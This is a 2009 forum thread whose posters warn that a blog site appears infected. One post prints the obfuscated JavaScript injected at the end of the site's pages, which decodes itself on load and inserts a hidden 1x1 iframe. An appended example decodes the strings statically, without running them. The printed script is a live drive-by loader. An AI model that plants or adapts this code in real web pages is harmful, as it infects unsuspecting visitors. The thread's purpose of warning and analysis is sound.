Free Republic
Browse · Search
Smoky Backroom
Topics · Post Article

To: Danae

“It’s just a warning.”

It is NOT just a warning. There is a program that will try to run and infect your system when you visit this site.

I’m trying to warn FReepers that don’t want the hassle/expense of digging out a bug, or recovering their data. That’s not likely, but I don’t know what this bug is yet but it caused my security setup to go ballistic.

I’ve NEVER had to do this before.

I deal with this stuff every day; the site/server is infected.


255 posted on 08/02/2009 3:13:46 AM PDT by Boucheau (The enemy of freedom is on the left.)
[ Post Reply | Private Reply | To 234 | View Replies ]


To: Boucheau

This is what I got on it: http://www.stopbadware.org/home/reviewinfo?hl=en-US&url=http%3A%2F%2Fwww.orlytaitzesq.com%2Fblog1%2F


272 posted on 08/02/2009 3:17:39 AM PDT by Danae (I AM JIM THOMPSON - Conservative does not equal Republican. Conservative does not compromise.)
[ Post Reply | Private Reply | To 255 | View Replies ]

To: Boucheau

OK, I’m upping my level of defenses.


279 posted on 08/02/2009 3:20:44 AM PDT by Red Steel
[ Post Reply | Private Reply | To 255 | View Replies ]

To: Boucheau

What is your opinion of using Linux as I do? I just changed security settings in Firefox and went to the site last night. Still there this morning.


311 posted on 08/02/2009 3:30:45 AM PDT by vanilla swirl
[ Post Reply | Private Reply | To 255 | View Replies ]

To: Boucheau
There is a piece of obfuscated JavaScript at the end of the body element, apparently added mechanically right above the /body end tag, below the page designer's signature, which decodes itself and executes something hidden upon loading of the page. I have the Firefox NoScript add-on, which blocks scripts unless explicitly enabled, so it didn't run the code on my machine. If someone has half an hour to run the code, display the output of the decoder (the function YuLQmW below) on the obfuscated strings and see what it does, here it is:

<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

<script > function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var
SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){
AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf
+= String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;}
function hjgksr(){var GncOozzc=new Function("QtBFdMu",
"return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f,
'U','299U288U300U314U290U298U289U315U')+"."+
YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var
zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e,
'V','181V224V239V251V232V228V236V169V254V224V237V253V225
V180V184V169V225V236V224V238V225V253V180V184V169V235V230
V251V237V236V251V180V185V169V239V251V232V228V236V235V230
V251V237V236V251V180V185V169V250V251V234V180V174V225V253
V253V249V179V166V166V250V236V234V252V251V224V253V240V164
V232V229V236V251V253V250V167V234V231V166V234V240V235V236
V251V166V224V231V167V234V238V224V182V189V174V183V181V166
V224V239V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load',hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);} </script > </body> </html>

1,795 posted on 08/02/2009 9:58:37 AM PDT by nightlight7
[ Post Reply | Private Reply | To 255 | View Replies ]
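
The decoding requested in post 1,795 can be done statically, without loading the page or running the injected script. The following is an added example, not part of the original thread; the names `evalKey`, `decode`, `defang`, `SAMPLES` and `decodeAll` are hypothetical, and the third sample is only the first 25 tokens of the long string in the post.

```javascript
// Added example: static decoder for the obfuscated strings quoted in the post.
// Nothing from the page is executed; the XOR step is reimplemented as data handling.

// Sum a key expression such as "-0x13+0x8+0x2f" without eval().
function evalKey(expr) {
  const terms = expr.match(/[+-]?0x[0-9a-f]+/gi) || [];
  return terms.reduce((sum, t) => sum + parseInt(t, 16), 0);
}

// Same logic as YuLQmW(key, sep, data): split on sep, drop the trailing
// empty element, XOR each number with the key, map to a character.
function decode(key, sep, data) {
  return data.split(sep).slice(0, -1)
    .map(n => String.fromCharCode(Number(n) ^ key))
    .join('');
}

// Defang a decoded string so it can be pasted into a report safely.
function defang(s) {
  return s.replace(/http/gi, 'hxxp').replace(/\./g, '[.]');
}

// Key expressions and strings copied from the post. The third string is
// only its first 25 tokens; paste the full literal to decode the rest.
const SAMPLES = [
  ['-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f', 'U', '299U288U300U314U290U298U289U315U'],
  ['-0x7-0xe+0x14+0x3b1', 'G', '978G991G980G969G'],
  ['0x4+0x30+0x2c-0x25+0x0+0x4e', 'V',
   '181V224V239V251V232V228V236V169V254V224V237V253V225V180V184V169V' +
   '225V236V224V238V225V253V180V184V169V'],
];

function decodeAll(samples) {
  return samples.map(([k, sep, data]) => defang(decode(evalKey(k), sep, data)));
}

console.log(decodeAll(SAMPLES));
```

The first two strings decode to `document` and `body`, and the third begins `<iframe width=1 height=1 `, so the script appends a 1x1 iframe to the page body when the page loads.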



FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson